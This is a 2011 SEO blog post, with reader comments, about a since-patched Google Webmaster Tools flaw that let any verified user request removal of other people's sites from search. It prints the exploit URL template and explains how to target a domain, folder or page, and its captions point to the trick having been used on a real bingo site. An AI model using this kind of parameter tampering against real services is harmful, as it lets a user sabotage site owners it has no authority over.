Google loophole – food for thought

by Peter Young on July 19, 2011 · 5 comments

It was during a quick beer this afternoon, that my good friend Ryan Mckay told me about James Breckenridges post regarding the Google Webmaster Tools bug. For those that don’t know, there appears to have been a bug that allowed any verified Google Webmaster Tools user to remove pages, even if the site in question wasn’t under their direct juristiction. By simply typing in the following URL you could wield power many negative SEO’s only dream of:

https://www.google.com/webmasters/tools/removals-request?hl=en&siteUrl=http://{YOUR_URL}/&urlt={URL_TO_BLOCK}

By doing so you could block a whole site, section or single page, based on how you entered the URL. To block a site, use the top level domain (E.g. http://www.someurl.com/), to block a section (subfolder) use a subfolder URL (E.g. http://www.someurl.com/somefolder/) and to block a page use the specific page URL (E.g. http://www.someurl.com/somefolder/somepage.html). As the Compare the Market meerkat would say – Simples.


BingoplayUK before


BingoplayUK removal request


BingoplayUK now – 19/07/2011 23:02

Now the fact an unscrupulous user could do this is worrying enough – and whilst permanent deletion is unlikely due to the way these removal requests work this could still have had catastrophic events for any organisations which relied heavily on organic search for traffic. Just imagine if this has hit a site such as Moneysupermarket for example who dominate the UK marketplace for many high volume, high cost, terms such as mortgages, credit cards and car insurance. The exploitation of such a loophole could have been catastrophic.

Now imagine that self same organisation held all your personal data. Oh – wait with recent developments that is a real life scenario. What is really worrying to me is the simplicity of the loophole, a simple change to the query string and one could make merry hay. No checking or validation against user data. As long as they were a Webmaster Tools user that was good enough. That to me is a very worrying scenario, and to be honest one that makes me very conscious of the amount of data I am happy to give Google.

This may well just be a reality check. We have seen a lot of development from Google over the last year or so, to the point that it seems that not a day goes by without another tweak, change or test. With that has to come a degree of danger in terms of ensuring that all the i’s are dotted and t’s crossed.

I have to commend Google on the time it has taken for them to react to the loophole, certainly by the time I was doing the State of Search Webmaster Radio show with Bas Van Den Beld and Roy Huiskes the patch had been fixed. However if this was a simple oversight, I seriously hope its a one off and perhaps a wake up call that it only takes one mistake to see it all come crashing down.

Google+ Comments

{ 5 comments… read them below or add one }

Adrian Land July 19, 2011 at 10:34 pm

Wow that is scary. Good spot.

Gary Bennion July 20, 2011 at 8:55 am

That’s amazing! Maybe Google have been too busy releasing plus, chrome networks, panda and all the rest that they’ve started to lose sight of the basics?

Good post.

Azzam July 20, 2011 at 11:41 am

I actually attempted to replicate this and got hit by a 404 page in Google Webmaster Tools.

James Lowery July 20, 2011 at 8:26 pm

I can’t believe that this worked as it did. I’ve blocked folders and pages using the interface in GWT in the past, and Google stated that you needed to block with Robots.

Looks as though the bingoplayuk website is back in the results now.

Peter Young July 21, 2011 at 11:47 am

I understand this has now been patched

Leave a Comment

Previous post:

Next post: